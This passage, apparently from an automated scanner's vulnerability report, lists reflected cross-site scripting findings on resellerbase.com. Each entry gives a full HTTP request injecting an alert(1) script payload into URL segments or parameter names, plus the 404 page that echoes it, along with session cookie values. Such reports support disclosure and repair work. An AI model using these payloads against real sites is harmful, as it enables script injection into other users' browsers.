Host:   http://www.resellerbase.com
Path:   /detail/44/white-label-seo-resellers-search-engine-optimisation.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 64193<script>alert(1)</script>b5a41d303fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/64193<script>alert(1)</script>b5a41d303fd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/64193<script>alert(1)</script>b5a41d303fd was not found on this server.</p>
...[SNIP]...

2.3170. http://www.resellerbase.com/detail/45/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1da14<script>alert(1)</script>22a58dc2953 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1da14<script>alert(1)</script>22a58dc2953/45/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1da14<script>alert(1)</script>22a58dc2953/45/ was not found on this server.</p>
...[SNIP]...

2.3171. http://www.resellerbase.com/detail/45/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b17c<script>alert(1)</script>5949b36fddd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/456b17c<script>alert(1)</script>5949b36fddd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/456b17c<script>alert(1)</script>5949b36fddd/ was not found on this server.</p>
...[SNIP]...

2.3172. http://www.resellerbase.com/detail/45/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b2d22<script>alert(1)</script>9ef3a8732d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/?b2d22<script>alert(1)</script>9ef3a8732d8=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/?b2d22<script>alert(1)</script>9ef3a8732d8=1 was not found on this server.</p>
...[SNIP]...

2.3173. http://www.resellerbase.com/detail/45/dograecorp.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/dograecorp.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 552b4<script>alert(1)</script>ab4b2a570fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail552b4<script>alert(1)</script>ab4b2a570fd/45/dograecorp.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail552b4<script>alert(1)</script>ab4b2a570fd/45/dograecorp.html was not found on this server.</p>
...[SNIP]...

2.3174. http://www.resellerbase.com/detail/45/dograecorp.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/dograecorp.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2d609<a>b0a53c690bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/452d609<a>b0a53c690bc/dograecorp.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/452d609<a>b0a53c690bc/dograecorp.html was not found on this server.</p>
...[SNIP]...

2.3175. http://www.resellerbase.com/detail/45/dograecorp.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/dograecorp.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 522b9<script>alert(1)</script>39f566658ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/522b9<script>alert(1)</script>39f566658ec HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/522b9<script>alert(1)</script>39f566658ec was not found on this server.</p>
...[SNIP]...

2.3176. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a59a8<script>alert(1)</script>d40084732f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila59a8<script>alert(1)</script>d40084732f7/45/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila59a8<script>alert(1)</script>d40084732f7/45/rating.php was not found on this server.</p>
...[SNIP]...

2.3177. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 594e6<script>alert(1)</script>2c4b335fdfb7c6460 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail594e6<script>alert(1)</script>2c4b335fdfb7c6460/45/rating.php?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail594e6<script>alert(1)</script>2c4b335fdfb7c6460/45/rating.php?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3178. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42afe<script>alert(1)</script>36a33176e2fc137ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/4542afe<script>alert(1)</script>36a33176e2fc137ea/rating.php?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4542afe<script>alert(1)</script>36a33176e2fc137ea/rating.php?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3179. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61fca<script>alert(1)</script>6c8905ef1d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4561fca<script>alert(1)</script>6c8905ef1d2/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4561fca<script>alert(1)</script>6c8905ef1d2/rating.php was not found on this server.</p>
...[SNIP]...

2.3180. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11d4a<script>alert(1)</script>d3572ac709f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/rating.php11d4a<script>alert(1)</script>d3572ac709f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php11d4a<script>alert(1)</script>d3572ac709f was not found on this server.</p>
...[SNIP]...

2.3181. http://www.resellerbase.com/detail/45/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34ff1<script>alert(1)</script>fd43a952af9a24421 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/45/rating.php34ff1<script>alert(1)</script>fd43a952af9a24421?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php34ff1<script>alert(1)</script>fd43a952af9a24421?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3182. http://www.resellerbase.com/detail/45/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f7547<script>alert(1)</script>624c62f9383 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/rating.php?f7547<script>alert(1)</script>624c62f9383=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php?f7547<script>alert(1)</script>624c62f9383=1 was not found on this server.</p>
...[SNIP]...

2.3183. http://www.resellerbase.com/detail/45/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 66c98<script>alert(1)</script>513faa9401c8eaf52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/45/rating.php/66c98<script>alert(1)</script>513faa9401c8eaf52?id=45&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/rating.php/66c98<script>alert(1)</script>513faa9401c8eaf52?id=45&rating=5 was not found on this server.</p>
...[SNIP]...

2.3184. http://www.resellerbase.com/detail/45/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28f94<script>alert(1)</script>c0bb8e6bd87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail28f94<script>alert(1)</script>c0bb8e6bd87/45/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail28f94<script>alert(1)</script>c0bb8e6bd87/45/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3185. http://www.resellerbase.com/detail/45/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74651<script>alert(1)</script>9fa25c38f63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4574651<script>alert(1)</script>9fa25c38f63/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4574651<script>alert(1)</script>9fa25c38f63/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3186. http://www.resellerbase.com/detail/45/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd643<script>alert(1)</script>ca4097650ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/search.phpbd643<script>alert(1)</script>ca4097650ae?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.phpbd643<script>alert(1)</script>ca4097650ae?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3187. http://www.resellerbase.com/detail/45/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bd4d0<a>1ecd127aa72 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/search.php?keyword=search...&Submit3=Searchbd4d0<a>1ecd127aa72&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/search.php?keyword=search...&Submit3=Searchbd4d0<a>1ecd127aa72&opt=2 was not found on this server.</p>
...[SNIP]...

2.3188. http://www.resellerbase.com/detail/45/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a4061<a>50281836e8d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

